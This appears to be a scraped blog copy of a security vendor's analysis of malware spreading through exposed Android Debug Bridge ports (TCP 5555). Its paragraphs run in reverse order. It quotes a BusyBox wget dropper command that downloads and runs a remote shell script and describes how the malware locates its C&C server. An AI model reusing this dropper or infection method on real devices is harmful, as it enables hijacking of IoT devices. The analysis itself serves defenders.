![]() It then checks if its own name is “./.f” with the parameter “yItDitb2HvayJvNc.” If this turns out positive, it will use a hostname “nukrainianhorseridingcom” to resolve the address of the C&C server through the Google DNS server. The binary starts by deleting its own binary file from a filesystem. Code of the shell script that was downloaded via wget An example of the wget version can be seen below:įigure 4. The first one uses curl and the second one wget built in BusyBox. They both do the same thing but use different download methods. The scripts download the next stage binary for several architectures and launch the corresponding one. ASCII and hex view of the malicious payload from the July 15 activity As before, it will remove them after execution: In contrast, the payload for the July 15 activity downloads two scripts instead: the earlier “adbs” and a new script called“adbs2”. ASCII and hex view of the malicious payload from the July 9 activity cd /dev/ busybox wget hxxp://9521562169/adbs -O -> adbs sh adbs rm adbsįigure 2.The shell script for the July 9 activity can be seen below: The payload will download the shell script, which is removed after execution: Once it's dropped into a device, the payload will delete itself from the disk and renamed with a randomly selected name with an architecture string attached. ![]() It attacks ADB by uploading the payload via TCP port 5555: This script downloads the two stage 2 shell scripts responsible for launching the stage 3 binary. It drops the stage 1 shell script via ADB connection to launch on the targeted system. Note the spike on July 9 and 10 and a second spike on July 15įrom our analysis of the network packets, we determined that the malware spreads via scanned open ADB ports. Activity in the TCP Port 5555 from July 1 to July 15. Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.įigure 1. In this scenario, the activity involves the command line utility called Android Debug Bridge (ADB), a part of the Android SDK that handles communication between devices that also allows developers to run and debug apps on Android devices. Recently, we found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. TCP port 5555, in particular, has had issues in the past due to product manufacturers leaving it open before shipping, which potentially exposes users to attackers. The exploitation of open ports on devices has been an on-going problem for many IoT users.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |